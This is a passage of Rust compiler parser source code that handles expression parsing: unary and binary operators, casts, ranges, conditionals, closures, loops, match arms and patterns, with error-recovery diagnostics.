lo.to(self.prev_span),
"try parenthesizing the first index",
sugg,
Applicability::MachineApplicable
);
}
return Err(err);
}
_ => {
// FIXME Could factor this out into non_fatal_unexpected or something.
let actual = self.this_token_to_string();
self.span_err(self.span, &format!("unexpected token: `{}`", actual));
}
}
continue;
}
if self.expr_is_complete(&e) { break; }
match self.token {
// expr(...)
token::OpenDelim(token::Paren) => {
let seq = self.parse_unspanned_seq(
&token::OpenDelim(token::Paren),
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| Ok(p.parse_expr()?)
).map(|es| {
let nd = self.mk_call(e, es);
let hi = self.prev_span;
self.mk_expr(lo.to(hi), nd, ThinVec::new())
});
e = self.recover_seq_parse_error(token::Paren, lo, seq);
}
// expr[...]
// Could be either an index expression or a slicing expression.
token::OpenDelim(token::Bracket) => {
self.bump();
let ix = self.parse_expr()?;
hi = self.span;
self.expect(&token::CloseDelim(token::Bracket))?;
let index = self.mk_index(e, ix);
e = self.mk_expr(lo.to(hi), index, ThinVec::new())
}
_ => return Ok(e)
}
}
return Ok(e);
}
crate fn process_potential_macro_variable(&mut self) {
let (token, span) = match self.token {
token::Dollar if self.span.ctxt() != syntax_pos::hygiene::SyntaxContext::empty() &&
self.look_ahead(1, |t| t.is_ident()) => {
self.bump();
let name = match self.token {
token::Ident(ident, _) => ident,
_ => unreachable!()
};
let mut err = self.fatal(&format!("unknown macro variable `{}`", name));
err.span_label(self.span, "unknown macro variable");
err.emit();
self.bump();
return
}
token::Interpolated(ref nt) => {
self.meta_var_span = Some(self.span);
// Interpolated identifier and lifetime tokens are replaced with usual identifier
// and lifetime tokens, so the former are never encountered during normal parsing.
match **nt {
token::NtIdent(ident, is_raw) => (token::Ident(ident, is_raw), ident.span),
token::NtLifetime(ident) => (token::Lifetime(ident), ident.span),
_ => return,
}
}
_ => return,
};
self.token = token;
self.span = span;
}
/// Parses a single token tree from the input.
crate fn parse_token_tree(&mut self) -> TokenTree {
match self.token {
token::OpenDelim(..) => {
let frame = mem::replace(&mut self.token_cursor.frame,
self.token_cursor.stack.pop().unwrap());
self.span = frame.span.entire();
self.bump();
TokenTree::Delimited(
frame.span,
frame.delim,
frame.tree_cursor.stream.into(),
)
},
token::CloseDelim(_) | token::Eof => unreachable!(),
_ => {
let (token, span) = (mem::replace(&mut self.token, token::Whitespace), self.span);
self.bump();
TokenTree::Token(span, token)
}
}
}
/// Parses a stream of tokens into a list of `TokenTree`s, up to EOF.
pub fn parse_all_token_trees(&mut self) -> PResult<'a, Vec<TokenTree>> {
let mut tts = Vec::new();
while self.token != token::Eof {
tts.push(self.parse_token_tree());
}
Ok(tts)
}
pub fn parse_tokens(&mut self) -> TokenStream {
let mut result = Vec::new();
loop {
match self.token {
token::Eof | token::CloseDelim(..) => break,
_ => result.push(self.parse_token_tree().into()),
}
}
TokenStream::new(result)
}
/// Parses a prefix-unary-operator expression.
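///
/// A sketch of the prefix forms handled below:
///
/// ```text
/// !e          // UnOp::Not
/// ~e          // error; recovered as `!e` with a suggestion
/// -e          // UnOp::Neg
/// *e          // UnOp::Deref
/// &e, &mut e  // ExprKind::AddrOf
/// box e       // ExprKind::Box
/// ```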
fn parse_prefix_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
let attrs = self.parse_or_use_outer_attributes(already_parsed_attrs)?;
let lo = self.span;
// Note: when adding new unary operators, don't forget to adjust Token::can_begin_expr()
let (hi, ex) = match self.token {
token::Not => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Not, e))
}
// Suggest `!` for bitwise negation when encountering a `~`
token::Tilde => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
let span_of_tilde = lo;
let mut err = self.diagnostic()
.struct_span_err(span_of_tilde, "`~` cannot be used as a unary operator");
err.span_suggestion_short(
span_of_tilde,
"use `!` to perform bitwise negation",
"!".to_owned(),
Applicability::MachineApplicable
);
err.emit();
(lo.to(span), self.mk_unary(UnOp::Not, e))
}
token::BinOp(token::Minus) => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Neg, e))
}
token::BinOp(token::Star) => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Deref, e))
}
token::BinOp(token::And) | token::AndAnd => {
self.expect_and()?;
let m = self.parse_mutability();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), ExprKind::AddrOf(m, e))
}
token::Ident(..) if self.token.is_keyword(kw::Box) => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), ExprKind::Box(e))
}
token::Ident(..) if self.token.is_ident_named(sym::not) => {
// `not` is just an ordinary identifier in Rust-the-language,
// but as `rustc`-the-compiler, we can issue clever diagnostics
// for confused users who really want to say `!`
let token_cannot_continue_expr = |t: &token::Token| match *t {
// These tokens can start an expression after `!`, but
// can't continue an expression after an ident
token::Ident(ident, is_raw) => token::ident_can_begin_expr(ident, is_raw),
token::Literal(..) | token::Pound => true,
token::Interpolated(ref nt) => match **nt {
token::NtIdent(..) | token::NtExpr(..) |
token::NtBlock(..) | token::NtPath(..) => true,
_ => false,
},
_ => false
};
let cannot_continue_expr = self.look_ahead(1, token_cannot_continue_expr);
if cannot_continue_expr {
self.bump();
// Emit the error ...
let mut err = self.diagnostic()
.struct_span_err(self.span,
&format!("unexpected {} after identifier",
self.this_token_descr()));
// span the `not` plus trailing whitespace to avoid
// trailing whitespace after the `!` in our suggestion
let to_replace = self.sess.source_map()
.span_until_non_whitespace(lo.to(self.span));
err.span_suggestion_short(
to_replace,
"use `!` to perform logical negation",
"!".to_owned(),
Applicability::MachineApplicable
);
err.emit();
// —and recover! (just as if we were in the block
// for the `token::Not` arm)
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Not, e))
} else {
return self.parse_dot_or_call_expr(Some(attrs));
}
}
_ => { return self.parse_dot_or_call_expr(Some(attrs)); }
};
return Ok(self.mk_expr(lo.to(hi), ex, attrs));
}
/// Parses an associative expression.
///
/// This parses an expression accounting for associativity and precedence of the operators in
/// the expression.
#[inline]
fn parse_assoc_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
self.parse_assoc_expr_with(0, already_parsed_attrs.into())
}
/// Parses an associative expression with operators of at least `min_prec` precedence.
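///
/// This is precedence climbing: after the prefix expression is taken as the
/// LHS, the loop consumes operators of precedence at least `min_prec`,
/// recursing with a raised minimum for each RHS. For example:
///
/// ```text
/// 1 + 2 * 3   =>   Binary(+, 1, Binary(*, 2, 3))
/// 1 * 2 + 3   =>   Binary(+, Binary(*, 1, 2), 3)
/// ```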
fn parse_assoc_expr_with(&mut self,
min_prec: usize,
lhs: LhsExpr)
-> PResult<'a, P<Expr>> {
let mut lhs = if let LhsExpr::AlreadyParsed(expr) = lhs {
expr
} else {
let attrs = match lhs {
LhsExpr::AttributesParsed(attrs) => Some(attrs),
_ => None,
};
if [token::DotDot, token::DotDotDot, token::DotDotEq].contains(&self.token) {
return self.parse_prefix_range_expr(attrs);
} else {
self.parse_prefix_expr(attrs)?
}
};
match (self.expr_is_complete(&lhs), AssocOp::from_token(&self.token)) {
(true, None) => {
// Semi-statement forms are odd. See https://github.com/rust-lang/rust/issues/29071
return Ok(lhs);
}
(false, _) => {} // continue parsing the expression
// An exhaustive check is done in the following block, but these are checked first
// because they *are* ambiguous but also reasonable looking incorrect syntax, so we
// want to keep their span info to improve diagnostics in these cases in a later stage.
(true, Some(AssocOp::Multiply)) | // `{ 42 } *foo = bar;` or `{ 42 } * 3`
(true, Some(AssocOp::Subtract)) | // `{ 42 } -5`
(true, Some(AssocOp::LAnd)) | // `{ 42 } &&x` (#61475)
(true, Some(AssocOp::Add)) // `{ 42 } + 42`
// If the next token is a keyword, then the tokens above *are* unambiguously incorrect:
// `if x { a } else { b } && if y { c } else { d }`
if !self.look_ahead(1, |t| t.is_reserved_ident()) => {
// These cases are ambiguous and can't be identified in the parser alone
let sp = self.sess.source_map().start_point(self.span);
self.sess.ambiguous_block_expr_parse.borrow_mut().insert(sp, lhs.span);
return Ok(lhs);
}
(true, Some(ref op)) if !op.can_continue_expr_unambiguously() => {
return Ok(lhs);
}
(true, Some(_)) => {
// We've found an expression that would be parsed as a statement, but the next
// token implies this should be parsed as an expression.
// For example: `if let Some(x) = x { x } else { 0 } / 2`
let mut err = self.sess.span_diagnostic.struct_span_err(self.span, &format!(
"expected expression, found `{}`",
pprust::token_to_string(&self.token),
));
err.span_label(self.span, "expected expression");
self.sess.expr_parentheses_needed(
&mut err,
lhs.span,
Some(pprust::expr_to_string(&lhs)),
);
err.emit();
}
}
self.expected_tokens.push(TokenType::Operator);
while let Some(op) = AssocOp::from_token(&self.token) {
// Adjust the span for interpolated LHS to point to the `$lhs` token and not to what
// it refers to. Interpolated identifiers are unwrapped early and never show up here
// as `PrevTokenKind::Interpolated` so if LHS is a single identifier we always process
// it as "interpolated", it doesn't change the answer for non-interpolated idents.
let lhs_span = match (self.prev_token_kind, &lhs.node) {
(PrevTokenKind::Interpolated, _) => self.prev_span,
(PrevTokenKind::Ident, &ExprKind::Path(None, ref path))
if path.segments.len() == 1 => self.prev_span,
_ => lhs.span,
};
let cur_op_span = self.span;
let restrictions = if op.is_assign_like() {
self.restrictions & Restrictions::NO_STRUCT_LITERAL
} else {
self.restrictions
};
let prec = op.precedence();
if prec < min_prec {
break;
}
// Check for deprecated `...` syntax
if self.token == token::DotDotDot && op == AssocOp::DotDotEq {
self.err_dotdotdot_syntax(self.span);
}
self.bump();
if op.is_comparison() {
self.check_no_chained_comparison(&lhs, &op);
}
// Special cases:
if op == AssocOp::As {
lhs = self.parse_assoc_op_cast(lhs, lhs_span, ExprKind::Cast)?;
continue
} else if op == AssocOp::Colon {
let maybe_path = self.could_ascription_be_path(&lhs.node);
let next_sp = self.span;
lhs = match self.parse_assoc_op_cast(lhs, lhs_span, ExprKind::Type) {
Ok(lhs) => lhs,
Err(mut err) => {
self.bad_type_ascription(
&mut err,
lhs_span,
cur_op_span,
next_sp,
maybe_path,
);
return Err(err);
}
};
continue
} else if op == AssocOp::DotDot || op == AssocOp::DotDotEq {
// If we didn’t have to handle `x..`/`x..=`, it would be pretty easy to
// generalise it to the Fixity::None code.
//
// We have 2 alternatives here: `x..y`/`x..=y` and `x..`/`x..=`. The other
// two variants are handled with the `parse_prefix_range_expr` call above.
let rhs = if self.is_at_start_of_range_notation_rhs() {
Some(self.parse_assoc_expr_with(prec + 1, LhsExpr::NotYetParsed)?)
} else {
None
};
let (lhs_span, rhs_span) = (lhs.span, if let Some(ref x) = rhs {
x.span
} else {
cur_op_span
});
let limits = if op == AssocOp::DotDot {
RangeLimits::HalfOpen
} else {
RangeLimits::Closed
};
let r = self.mk_range(Some(lhs), rhs, limits)?;
lhs = self.mk_expr(lhs_span.to(rhs_span), r, ThinVec::new());
break
}
let fixity = op.fixity();
let prec_adjustment = match fixity {
Fixity::Right => 0,
Fixity::Left => 1,
// We currently have no non-associative operators that are not handled above by
// the special cases. The code is here only for future convenience.
Fixity::None => 1,
};
let rhs = self.with_res(
restrictions - Restrictions::STMT_EXPR,
|this| this.parse_assoc_expr_with(prec + prec_adjustment, LhsExpr::NotYetParsed)
)?;
// Make sure that the span of the parent node is larger than the span of lhs and rhs,
// including the attributes.
let lhs_span = lhs
.attrs
.iter()
.filter(|a| a.style == AttrStyle::Outer)
.next()
.map_or(lhs_span, |a| a.span);
let span = lhs_span.to(rhs.span);
lhs = match op {
AssocOp::Add | AssocOp::Subtract | AssocOp::Multiply | AssocOp::Divide |
AssocOp::Modulus | AssocOp::LAnd | AssocOp::LOr | AssocOp::BitXor |
AssocOp::BitAnd | AssocOp::BitOr | AssocOp::ShiftLeft | AssocOp::ShiftRight |
AssocOp::Equal | AssocOp::Less | AssocOp::LessEqual | AssocOp::NotEqual |
AssocOp::Greater | AssocOp::GreaterEqual => {
let ast_op = op.to_ast_binop().unwrap();
let binary = self.mk_binary(source_map::respan(cur_op_span, ast_op), lhs, rhs);
self.mk_expr(span, binary, ThinVec::new())
}
AssocOp::Assign => self.mk_expr(span, ExprKind::Assign(lhs, rhs), ThinVec::new()),
AssocOp::AssignOp(k) => {
let aop = match k {
token::Plus => BinOpKind::Add,
token::Minus => BinOpKind::Sub,
token::Star => BinOpKind::Mul,
token::Slash => BinOpKind::Div,
token::Percent => BinOpKind::Rem,
token::Caret => BinOpKind::BitXor,
token::And => BinOpKind::BitAnd,
token::Or => BinOpKind::BitOr,
token::Shl => BinOpKind::Shl,
token::Shr => BinOpKind::Shr,
};
let aopexpr = self.mk_assign_op(source_map::respan(cur_op_span, aop), lhs, rhs);
self.mk_expr(span, aopexpr, ThinVec::new())
}
AssocOp::As | AssocOp::Colon | AssocOp::DotDot | AssocOp::DotDotEq => {
self.bug("AssocOp should have been handled by special case")
}
};
if let Fixity::None = fixity { break }
}
Ok(lhs)
}
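/// Parses the type on the RHS of an `as` cast or a `:` type ascription, with
/// recovery for cases like `x as usize < y`: the parser snapshots itself,
/// first tries `usize < y` as a type with generic arguments, and on failure
/// rewinds and re-parses a plain path so it can suggest parenthesizing the
/// cast value.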
fn parse_assoc_op_cast(&mut self, lhs: P<Expr>, lhs_span: Span,
expr_kind: fn(P<Expr>, P<Ty>) -> ExprKind)
-> PResult<'a, P<Expr>> {
let mk_expr = |this: &mut Self, rhs: P<Ty>| {
this.mk_expr(lhs_span.to(rhs.span), expr_kind(lhs, rhs), ThinVec::new())
};
// Save the state of the parser before parsing type normally, in case there is a
// LessThan comparison after this cast.
let parser_snapshot_before_type = self.clone();
match self.parse_ty_no_plus() {
Ok(rhs) => {
Ok(mk_expr(self, rhs))
}
Err(mut type_err) => {
// Rewind to before attempting to parse the type with generics, to recover
// from situations like `x as usize < y` in which we first tried to parse
// `usize < y` as a type with generic arguments.
let parser_snapshot_after_type = self.clone();
mem::replace(self, parser_snapshot_before_type);
match self.parse_path(PathStyle::Expr) {
Ok(path) => {
let (op_noun, op_verb) = match self.token {
token::Lt => ("comparison", "comparing"),
token::BinOp(token::Shl) => ("shift", "shifting"),
_ => {
// We can end up here even without `<` being the next token, for
// example because `parse_ty_no_plus` returns `Err` on keywords,
// but `parse_path` returns `Ok` on them due to error recovery.
// Return original error and parser state.
mem::replace(self, parser_snapshot_after_type);
return Err(type_err);
}
};
// Successfully parsed the type path leaving a `<` yet to parse.
type_err.cancel();
// Report non-fatal diagnostics, keep `x as usize` as an expression
// in AST and continue parsing.
let msg = format!("`<` is interpreted as a start of generic \
arguments for `{}`, not a {}", path, op_noun);
let mut err = self.sess.span_diagnostic.struct_span_err(self.span, &msg);
err.span_label(self.look_ahead_span(1).to(parser_snapshot_after_type.span),
"interpreted as generic arguments");
err.span_label(self.span, format!("not interpreted as {}", op_noun));
let expr = mk_expr(self, P(Ty {
span: path.span,
node: TyKind::Path(None, path),
id: ast::DUMMY_NODE_ID
}));
let expr_str = self.sess.source_map().span_to_snippet(expr.span)
.unwrap_or_else(|_| pprust::expr_to_string(&expr));
err.span_suggestion(
expr.span,
&format!("try {} the cast value", op_verb),
format!("({})", expr_str),
Applicability::MachineApplicable
);
err.emit();
Ok(expr)
}
Err(mut path_err) => {
// Couldn't parse as a path, return original error and parser state.
path_err.cancel();
mem::replace(self, parser_snapshot_after_type);
Err(type_err)
}
}
}
}
}
/// Parses prefix forms of range notation: `..expr`, `..`, `..=expr`.
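///
/// A sketch of the resulting AST, per the limits computed below:
///
/// ```text
/// ..      => ExprKind::Range(None, None,     HalfOpen)
/// ..hi    => ExprKind::Range(None, Some(hi), HalfOpen)
/// ..=hi   => ExprKind::Range(None, Some(hi), Closed)
/// ```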
fn parse_prefix_range_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
// Check for deprecated `...` syntax
if self.token == token::DotDotDot {
self.err_dotdotdot_syntax(self.span);
}
debug_assert!([token::DotDot, token::DotDotDot, token::DotDotEq].contains(&self.token),
"parse_prefix_range_expr: token {:?} is not DotDot/DotDotDot/DotDotEq",
self.token);
let tok = self.token.clone();
let attrs = self.parse_or_use_outer_attributes(already_parsed_attrs)?;
let lo = self.span;
let mut hi = self.span;
self.bump();
let opt_end = if self.is_at_start_of_range_notation_rhs() {
// The RHS must be parsed with higher precedence than the dots.
let next_prec = AssocOp::from_token(&tok).unwrap().precedence() + 1;
Some(self.parse_assoc_expr_with(next_prec,
LhsExpr::NotYetParsed)
.map(|x|{
hi = x.span;
x
})?)
} else {
None
};
let limits = if tok == token::DotDot {
RangeLimits::HalfOpen
} else {
RangeLimits::Closed
};
let r = self.mk_range(None, opt_end, limits)?;
Ok(self.mk_expr(lo.to(hi), r, attrs))
}
fn is_at_start_of_range_notation_rhs(&self) -> bool {
if self.token.can_begin_expr() {
// parse `for i in 1.. { }` as an infinite loop, not as `for i in (1..{})`.
if self.token == token::OpenDelim(token::Brace) {
return !self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL);
}
true
} else {
false
}
}
/// Parses an `if` or `if let` expression (`if` token already eaten).
fn parse_if_expr(&mut self, attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
if self.check_keyword(kw::Let) {
return self.parse_if_let_expr(attrs);
}
let lo = self.prev_span;
let cond = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
// Verify that the parsed `if` condition makes sense as a condition. If it is a block, then
// verify that its last statement is an implicit return (an expression without `;`). This
// won't catch blocks ending in an explicit `return`, but those are caught by the dead code lint.
if self.eat_keyword(kw::Else) || !cond.returns() {
let sp = self.sess.source_map().next_point(lo);
let mut err = self.diagnostic()
.struct_span_err(sp, "missing condition for `if` statement");
err.span_label(sp, "expected if condition here");
return Err(err)
}
let not_block = self.token != token::OpenDelim(token::Brace);
let thn = self.parse_block().map_err(|mut err| {
if not_block {
err.span_label(lo, "this `if` statement has a condition, but no block");
}
err
})?;
let mut els: Option<P<Expr>> = None;
let mut hi = thn.span;
if self.eat_keyword(kw::Else) {
let elexpr = self.parse_else_expr()?;
hi = elexpr.span;
els = Some(elexpr);
}
Ok(self.mk_expr(lo.to(hi), ExprKind::If(cond, thn, els), attrs))
}
/// Parses an `if let` expression (`if` token already eaten).
fn parse_if_let_expr(&mut self, attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>> {
let lo = self.prev_span;
self.expect_keyword(kw::Let)?;
let pats = self.parse_pats()?;
self.expect(&token::Eq)?;
let expr = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let thn = self.parse_block()?;
let (hi, els) = if self.eat_keyword(kw::Else) {
let expr = self.parse_else_expr()?;
(expr.span, Some(expr))
} else {
(thn.span, None)
};
Ok(self.mk_expr(lo.to(hi), ExprKind::IfLet(pats, expr, thn, els), attrs))
}
/// Parses `move |args| expr`.
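///
/// More generally (a sketch of what the parsing below accepts):
/// `[static] [async] [move] |args| [-> Ty] body`, where an explicit return
/// type requires the body to be a block (RFC 968), and `async` closures are
/// only parsed on the 2018 edition.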
fn parse_lambda_expr(&mut self,
attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>>
{
let lo = self.span;
let movability = if self.eat_keyword(kw::Static) {
Movability::Static
} else {
Movability::Movable
};
let asyncness = if self.span.rust_2018() {
self.parse_asyncness()
} else {
IsAsync::NotAsync
};
let capture_clause = if self.eat_keyword(kw::Move) {
CaptureBy::Value
} else {
CaptureBy::Ref
};
let decl = self.parse_fn_block_decl()?;
let decl_hi = self.prev_span;
let body = match decl.output {
FunctionRetTy::Default(_) => {
let restrictions = self.restrictions - Restrictions::STMT_EXPR;
self.parse_expr_res(restrictions, None)?
},
_ => {
// If an explicit return type is given, require a
// block to appear (RFC 968).
let body_lo = self.span;
self.parse_block_expr(None, body_lo, BlockCheckMode::Default, ThinVec::new())?
}
};
Ok(self.mk_expr(
lo.to(body.span),
ExprKind::Closure(capture_clause, asyncness, movability, decl, body, lo.to(decl_hi)),
attrs))
}
// `else` token already eaten
fn parse_else_expr(&mut self) -> PResult<'a, P<Expr>> {
if self.eat_keyword(kw::If) {
return self.parse_if_expr(ThinVec::new());
} else {
let blk = self.parse_block()?;
return Ok(self.mk_expr(blk.span, ExprKind::Block(blk, None), ThinVec::new()));
}
}
/// Parses a `for ... in` expression (`for` token already eaten).
fn parse_for_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
// Parse: `for <src_pat> in <src_expr> <src_loop_block>`
let pat = self.parse_top_level_pat()?;
if !self.eat_keyword(kw::In) {
let in_span = self.prev_span.between(self.span);
let mut err = self.sess.span_diagnostic
.struct_span_err(in_span, "missing `in` in `for` loop");
err.span_suggestion_short(
in_span, "try adding `in` here", " in ".into(),
// has been misleading, at least in the past (closed Issue #48492)
Applicability::MaybeIncorrect
);
err.emit();
}
let in_span = self.prev_span;
self.check_for_for_in_in_typo(in_span);
let expr = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let (iattrs, loop_block) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let hi = self.prev_span;
Ok(self.mk_expr(span_lo.to(hi), ExprKind::ForLoop(pat, expr, loop_block, opt_label), attrs))
}
/// Parses a `while` or `while let` expression (`while` token already eaten).
fn parse_while_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
if self.token.is_keyword(kw::Let) {
return self.parse_while_let_expr(opt_label, span_lo, attrs);
}
let cond = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let span = span_lo.to(body.span);
return Ok(self.mk_expr(span, ExprKind::While(cond, body, opt_label), attrs));
}
/// Parses a `while let` expression (`while` token already eaten).
fn parse_while_let_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
self.expect_keyword(kw::Let)?;
let pats = self.parse_pats()?;
self.expect(&token::Eq)?;
let expr = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let span = span_lo.to(body.span);
return Ok(self.mk_expr(span, ExprKind::WhileLet(pats, expr, body, opt_label), attrs));
}
/// Parses a `loop { ... }` expression (`loop` token already eaten).
fn parse_loop_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let span = span_lo.to(body.span);
Ok(self.mk_expr(span, ExprKind::Loop(body, opt_label), attrs))
}
/// Parses an `async move {...}` expression.
pub fn parse_async_block(&mut self, mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>>
{
let span_lo = self.span;
self.expect_keyword(kw::Async)?;
let capture_clause = if self.eat_keyword(kw::Move) {
CaptureBy::Value
} else {
CaptureBy::Ref
};
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
Ok(self.mk_expr(
span_lo.to(body.span),
ExprKind::Async(capture_clause, ast::DUMMY_NODE_ID, body), attrs))
}
/// Parses a `try {...}` expression (`try` token already eaten).
fn parse_try_block(&mut self, span_lo: Span, mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>>
{
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
if self.eat_keyword(kw::Catch) {
let mut error = self.struct_span_err(self.prev_span,
"keyword `catch` cannot follow a `try` block");
error.help("try using `match` on the result of the `try` block instead");
error.emit();
Err(error)
} else {
Ok(self.mk_expr(span_lo.to(body.span), ExprKind::TryBlock(body), attrs))
}
}
// `match` token already eaten
fn parse_match_expr(&mut self, mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
let match_span = self.prev_span;
let lo = self.prev_span;
let discriminant = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL,
None)?;
if let Err(mut e) = self.expect(&token::OpenDelim(token::Brace)) {
if self.token == token::Token::Semi {
e.span_suggestion_short(
match_span,
"try removing this `match`",
String::new(),
Applicability::MaybeIncorrect // speculative
);
}
return Err(e)
}
attrs.extend(self.parse_inner_attributes()?);
let mut arms: Vec<Arm> = Vec::new();
while self.token != token::CloseDelim(token::Brace) {
match self.parse_arm() {
Ok(arm) => arms.push(arm),
Err(mut e) => {
// Recover by skipping to the end of the block.
e.emit();
self.recover_stmt();
let span = lo.to(self.span);
if self.token == token::CloseDelim(token::Brace) {
self.bump();
}
return Ok(self.mk_expr(span, ExprKind::Match(discriminant, arms), attrs));
}
}
}
let hi = self.span;
self.bump();
return Ok(self.mk_expr(lo.to(hi), ExprKind::Match(discriminant, arms), attrs));
}
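/// Parses a single `match` arm of the form `pats (if guard)? => expr`. A
/// trailing comma is required unless the body is a block-like expression or
/// the arm is the last one before the closing `}`.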
crate fn parse_arm(&mut self) -> PResult<'a, Arm> {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
let pats = self.parse_pats()?;
let guard = if self.eat_keyword(kw::If) {
Some(Guard::If(self.parse_expr()?))
} else {
None
};
let arrow_span = self.span;
self.expect(&token::FatArrow)?;
let arm_start_span = self.span;
let expr = self.parse_expr_res(Restrictions::STMT_EXPR, None)
.map_err(|mut err| {
err.span_label(arrow_span, "while parsing the `match` arm starting here");
err
})?;
let require_comma = classify::expr_requires_semi_to_be_stmt(&expr)
&& self.token != token::CloseDelim(token::Brace);
let hi = self.span;
if require_comma {
let cm = self.sess.source_map();
self.expect_one_of(&[token::Comma], &[token::CloseDelim(token::Brace)])
.map_err(|mut err| {
match (cm.span_to_lines(expr.span), cm.span_to_lines(arm_start_span)) {
(Ok(ref expr_lines), Ok(ref arm_start_lines))
if arm_start_lines.lines[0].end_col == expr_lines.lines[0].end_col
&& expr_lines.lines.len() == 2
&& self.token == token::FatArrow => {
// We check whether there's any trailing code in the parse span,
// if there isn't, we very likely have the following:
//
// X | &Y => "y"
// | -- - missing comma
// | |
// | arrow_span
// X | &X => "x"
// | - ^^ self.span
// | |
// | parsed until here as `"y" & X`
err.span_suggestion_short(
cm.next_point(arm_start_span),
"missing a comma here to end this `match` arm",
",".to_owned(),
Applicability::MachineApplicable
);
}
_ => {
err.span_label(arrow_span,
"while parsing the `match` arm starting here");
}
}
err
})?;
} else {
self.eat(&token::Comma);
}
Ok(ast::Arm {
attrs,
pats,
guard,
body: expr,
span: lo.to(hi),
})
}
/// Parses an expression.
#[inline]
pub fn parse_expr(&mut self) -> PResult<'a, P<Expr>> {
self.parse_expr_res(Restrictions::empty(), None)
}
/// Evaluates the closure with restrictions in place.
///
/// After the closure is evaluated, restrictions are reset.
fn with_res<F, T>(&mut self, r: Restrictions, f: F) -> T
where F: FnOnce(&mut Self) -> T
{
let old = self.restrictions;
self.restrictions = r;
let r = f(self);
self.restrictions = old;
return r;
}
/// Parses an expression, subject to the given restrictions.
#[inline]
fn parse_expr_res(&mut self, r: Restrictions,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
self.with_res(r, |this| this.parse_assoc_expr(already_parsed_attrs))
}
/// Parses the RHS of a local variable declaration (e.g., '= 14;').
fn parse_initializer(&mut self, skip_eq: bool) -> PResult<'a, Option<P<Expr>>> {
if self.eat(&token::Eq) {
Ok(Some(self.parse_expr()?))
} else if skip_eq {
Ok(Some(self.parse_expr()?))
} else {
Ok(None)
}
}
/// Parses one or more patterns, separated by `|`s.
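///
/// E.g., `A | B | C`; a leading `|` is also accepted (RFC 1925 + RFC 2530),
/// and `A || B` is recovered with a suggestion to use a single `|`.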
fn parse_pats(&mut self) -> PResult<'a, Vec<P<Pat>>> {
// Allow a '|' before the pats (RFC 1925 + RFC 2530)
self.eat(&token::BinOp(token::Or));
let mut pats = Vec::new();
loop {
pats.push(self.parse_top_level_pat()?);
if self.token == token::OrOr {
let mut err = self.struct_span_err(self.span,
"unexpected token `||` after pattern");
err.span_suggestion(
self.span,
"use a single `|` to specify multiple patterns",
"|".to_owned(),
Applicability::MachineApplicable
);
err.emit();
self.bump();
} else if self.eat(&token::BinOp(token::Or)) {
// This is a no-op. Continue the loop to parse the next
// pattern.
} else {
return Ok(pats);
}
};
}
// Parses a parenthesized list of patterns like
// `()`, `(p)`, `(p,)`, `(p, q)`, or `(p, .., q)`. Returns:
// - a vector of the patterns that were parsed
// - an option indicating the index of the `..` element
// - a boolean indicating whether a trailing comma was present.
// Trailing commas are significant because (p) and (p,) are different patterns.
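//
// For example, a sketch of the return values:
//
//     (a, .., b)   => (vec![a, b], Some(1), false)
//     (a, b,)      => (vec![a, b], None,    true)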
fn parse_parenthesized_pat_list(&mut self) -> PResult<'a, (Vec<P<Pat>>, Option<usize>, bool)> {
self.expect(&token::OpenDelim(token::Paren))?;
let result = match self.parse_pat_list() {
Ok(result) => result,
Err(mut err) => { // recover from parse error in tuple pattern list
err.emit();
self.consume_block(token::Paren);
return Ok((vec![], Some(0), false));
}
};
self.expect(&token::CloseDelim(token::Paren))?;
Ok(result)
}
fn parse_pat_list(&mut self) -> PResult<'a, (Vec<P<Pat>>, Option<usize>, bool)> {
let mut fields = Vec::new();
